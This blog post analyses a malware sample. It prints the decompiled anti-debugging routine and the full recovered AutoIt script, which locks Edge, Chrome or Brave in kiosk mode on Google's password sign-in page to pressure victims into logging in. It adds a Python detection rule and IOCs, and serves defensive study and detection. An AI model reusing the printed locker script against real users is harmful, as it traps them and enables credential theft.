CTI Analyst at @ActiveFence
Forensic at @World Wide Flags
Operator at @Cookie Han Hoan

Malware Analysis - Real Case 4

Hi everyone, this article is the next one I want to share with all of you. I analysed this malware yesterday, and I just saw a post from Whitehat about it, so I think it's really important to share how I analysed it so that you know how to protect yourselves from it! Let's go!

Sample: click here to see it

First, I checked malware information:

image

There's still nothing interesting here, so next I used IDA to analyse it:

image

sub_402A32(lpCmdLine); is the most suspicious call, so I checked it immediately and found something interesting:

int __stdcall sub_402A32(void *a1)
{
  char v1; // bl
  int v2; // ecx
  HWND ForegroundWindow; // eax
  const WCHAR *v5; // [esp-10h] [ebp-20048h]
  const WCHAR *v6; // [esp-Ch] [ebp-20044h]
  char v7; // [esp+11h] [ebp-20027h] BYREF
  char v8; // [esp+12h] [ebp-20026h]
  char v9; // [esp+13h] [ebp-20025h] BYREF
  LPWSTR FilePart; // [esp+14h] [ebp-20024h] BYREF
  LPCWSTR lpParameters[4]; // [esp+18h] [ebp-20020h] BYREF
  LPCWSTR lpFile[4]; // [esp+28h] [ebp-20010h] BYREF
  WCHAR Buffer[32768]; // [esp+38h] [ebp-20000h] BYREF
  WCHAR v14[32768]; // [esp+10038h] [ebp-10000h] BYREF

  sub_40A961(lpFile);
  v1 = 0;
  v7 = 0;
  v8 = 0;
  GetCurrentDirectoryW(0x7FFFu, Buffer);
  sub_402E37(a1, &v9);
  if ( IsDebuggerPresent() )
  {
    MessageBoxA(0, "This is a third-party compiled AutoIt script.", Caption, 0x10u);
    return sub_40988F(lpFile);
  }
  if ( dword_4D1400 )
  {
    if ( dword_4D1400 == 1 )
    {
      sub_4075AC(1, dword_4D1408, -1);
      byte_4D2392 = byte_4D1364;
      goto LABEL_6;
    }
    if ( (unsigned __int8)sub_402DE3(&lpFileName, &dword_4D1400, v2, &v7) )
    {
      v8 = HIBYTE(word_4D2390);
      byte_4D1404 = word_4D2390;
      GetFullPathNameW(lpFileName, 0x7FFFu, v14, &FilePart);
      sub_406B57(FilePart);
      v1 = v7;
LABEL_6:
      if ( sub_401CD0(&lpFileName, dword_4D1400) )
      {
        sub_403D1B(&word_4D2390);
        SetCurrentDirectoryW(Buffer);
        dword_4D135C = 1;
        return sub_40988F(lpFile);
      }
      if ( v8 != 1 || (unsigned __int8)sub_461663() || v9 )
      {
        sub_402B83();
        sub_402C63();
        if ( !byte_4D1404 )
          sub_403837(&dword_4D1990);
        sub_40D760(1);
        if ( !byte_4D1404 )
          sub_4030F2(&dword_4D1990);
      }
      else
      {
        sub_403A5A(lpFile);
        sub_409CB3(&unk_4C2224);
        if ( v1 )
        {
          sub_4033C6("\"");
          sub_406350(&lpFileName);
          sub_4033C6("\"");
        }
        else
        {
          sub_4033C6(a1);
        }
        v6 = lpParameters[0];
        v5 = lpFile[0];
        ForegroundWindow = GetForegroundWindow();
        ShellExecuteW(ForegroundWindow, L"runas", v5, v6, Buffer, 1);
        sub_40988F(lpParameters);
      }
      sub_403D1B(&word_4D2390);
      goto LABEL_13;
    }
    dword_4D135C = 1;
  }
  else
  {
    dword_4D135C = -1;
  }
LABEL_13:
  SetCurrentDirectoryW(Buffer);
  return sub_40988F(lpFile);
}

In this function, the first condition checks whether a debugger is attached; if one is, it shows the message "This is a third-party compiled AutoIt script." and returns. This is one of the techniques used for anti-debugging, and if you want to debug past it without being caught by this check you can install ScyllaHide, a plugin built for anti-anti-debugging. In this case it isn't necessary, because that string gives us something better to look at: it tells me the sample was compiled with AutoIt, and there is a tool that helps us analyse this type of malware. Open it, import the exe file, and this is what I got:

image

Local $url = "https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password"
Local $primarybrowser = ""
Local $primaryclass = ""
If FileExists("C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe") Or FileExists("C:\Program Files\Microsoft\Edge\Application\msedge.exe") Then
    $primarybrowser = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    $primaryclass = "[CLASS:Chrome_WidgetWin_1]"
ElseIf FileExists("C:\Program Files (x86)\Google\Chrome\Application\chrome.exe") Or FileExists("C:\Program Files\Google\Chrome\Application\chrome.exe") Then
    $primarybrowser = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
    $primaryclass = "[CLASS:Chrome_WidgetWin_1]"
ElseIf FileExists("C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe") Or FileExists("C:\Program Files (x86)\BraveSoftware\Brave-Browser\Application\brave.exe") Then
    $primarybrowser = "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe"
    $primaryclass = "[CLASS:Chrome_WidgetWin_1]"
Else
    Exit
EndIf
If StringInStr($primarybrowser, "msedge.exe") Then
    Run($primarybrowser & " --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $url)
Else
    Run($primarybrowser & " --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $url)
EndIf
Sleep(0x7d0)
Local $hwnd = WinGetHandle($primaryclass)
While 0x1
    If Not WinExists($hwnd) Then
        If StringInStr($primarybrowser, "msedge.exe") Then
            Run($primarybrowser & " --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $url)
        Else
            Run($primarybrowser & " --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $url)
        EndIf
        Sleep(0x7d0)
        $hwnd = WinGetHandle($primaryclass)
    EndIf
    WinSetOnTop($hwnd, "", 0x1)
    If Not WinActive($hwnd) Then
        WinActivate($hwnd)
    EndIf
    Sleep(0x1f4)
WEnd

Let’s analyse step by step:

  • First, they create the $url variable, which points to the Google sign-in screen (the account password settings page).
  • Second, there are three FileExists checks to find out which browser is installed on the computer: msedge, chrome or brave.
  • After locating the browser, it is launched with specific command-line options that build the kiosk experience. The --kiosk option starts the browser directly in kiosk mode, while --edge-kiosk-type=fullscreen makes that mode occupy the entire screen. Additional options such as --no-first-run and --disable-popup-blocking switch off features the user could otherwise interact with, leaving a stripped-down, locked-down browser window.
  • The script then pauses using Sleep(0x7d0) (2000 milliseconds, or 2 seconds) to give the browser time to start.
  • It retrieves the handle of the browser window with WinGetHandle($primaryclass).
  • The script enters an infinite loop (While 0x1).
  • If the browser window no longer exists (If Not WinExists($hwnd)), it reruns the browser with the same command line as before and reacquires the window handle.
  • The script uses WinSetOnTop($hwnd, "", 0x1) to keep the browser window on top of all other windows.
  • If the browser window is not active, it activates it with WinActivate($hwnd).
  • The script pauses briefly (Sleep(0x1f4), 500 milliseconds) in each iteration to avoid consuming too much CPU.
  • The loop continues indefinitely, ensuring the browser stays open, on top, and active in kiosk mode.
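The command lines listed above are also the best place to detect this behaviour from the defender's side. The following is an added example, not code from the original post or from the malware: it inspects process-creation events of the shape Sysmon Event ID 1 or EDR telemetry provides (image, parent image, command line) and flags a Chromium-based browser started with --kiosk plus an --app= URL, exactly the combination the decompiled script uses. TRUSTED_PARENTS and the second LOGIN_HOSTS entry are assumptions to tune for your own environment, and the sample events are constructed for the demo.

```python
"""Detection logic for the kiosk-mode browser lock-up described above.

Added example, not code from the original post or the malware. It flags a
browser launched with --kiosk and an --app= URL, scoring higher when the
parent process is not a normal launcher or the pinned URL is a login page.
"""
import re
from urllib.parse import urlparse

# Browsers the script looks for, plus the flag pair that defines the lock-up.
BROWSERS = ("msedge.exe", "chrome.exe", "brave.exe")
REQUIRED_FLAGS = ("--kiosk", "--app")

# Assumption: parents that may legitimately start a kiosk browser on your hosts.
TRUSTED_PARENTS = ("explorer.exe", "services.exe")
# accounts.google.com comes from the script; the Microsoft host is an added illustration.
LOGIN_HOSTS = ("accounts.google.com", "login.microsoftonline.com")

# A Chromium switch: preceded by whitespace, --name or --name=value (value has no spaces).
FLAG_RE = re.compile(r"(?<!\S)(--[A-Za-z0-9-]+(?:=\S+)?)")


def parse_flags(command_line):
    """Return every --switch[=value] token in a browser command line."""
    return FLAG_RE.findall(command_line)


def basename(path):
    """Last component of a Windows path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def inspect_launch(event):
    """Return an alert dict for a kiosk-mode browser launch, or None."""
    browser = basename(event["image"])
    if browser not in BROWSERS:
        return None
    flags = parse_flags(event["command_line"])
    names = {flag.split("=", 1)[0] for flag in flags}
    if not all(required in names for required in REQUIRED_FLAGS):
        return None
    app_url = next(f.split("=", 1)[1] for f in flags if f.startswith("--app="))
    host = (urlparse(app_url).hostname or "").lower()
    parent = basename(event.get("parent_image", ""))

    reasons = []
    if parent not in TRUSTED_PARENTS:
        reasons.append(f"started by untrusted parent {parent or '<unknown>'}")
    if host in LOGIN_HOSTS:
        reasons.append(f"kiosk pinned to login page {host}")
    return {
        "browser": browser,
        "parent": parent,
        "host": host,
        "url": app_url,
        "flags": flags,
        "severity": "high" if reasons else "medium",
        "reasons": reasons,
    }


def detect_kiosk_launches(events):
    """Run inspect_launch over a stream of events and keep only the alerts."""
    return [alert for alert in map(inspect_launch, events) if alert]


# Constructed sample telemetry: one launch matching the script, one ordinary
# browser start, and one plausible IT-managed kiosk for comparison.
SAMPLE_EVENTS = [
    {
        "parent_image": r"C:\Users\victim\Downloads\photo_viewer.exe",  # constructed dropper name
        "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
        "command_line": (
            r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" '
            "--kiosk --edge-kiosk-type=fullscreen --no-first-run "
            "--disable-features=TranslateUI --disable-popup-blocking "
            "--disable-extensions --no-default-browser-check "
            "--app=https://accounts.google.com/ServiceLogin?service=accountsettings"
            "&continue=https://myaccount.google.com/signinoptions/password"
        ),
    },
    {
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "command_line": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default',
    },
    {
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "command_line": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --kiosk --app=https://intranet.example/dashboard',
    },
]

if __name__ == "__main__":
    for alert in detect_kiosk_launches(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["browser"], alert["host"], "; ".join(alert["reasons"]))
```

Running it on the constructed events yields a high-severity alert for the Edge launch (untrusted parent and a login-page URL) and a medium one for the intranet kiosk, while the plain Chrome start is ignored; in production the parent list and login hosts are what you would tune first.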

Because of kiosk mode, many people cannot escape from the sign-in screen; they feel they have no choice but to sign in to their account, and at that moment attackers can do many things: steal sensitive data…


Summary:
MITRE ATT&CK: T1036.003, T1012, T1082.
IOC: 1cf0747ce1310fd989b24a93d2108784efb003948fdec1f7e64479213075cb90.

Thank you for reading my blog! See you in the next article. Bye 🫀🫀🫀!!
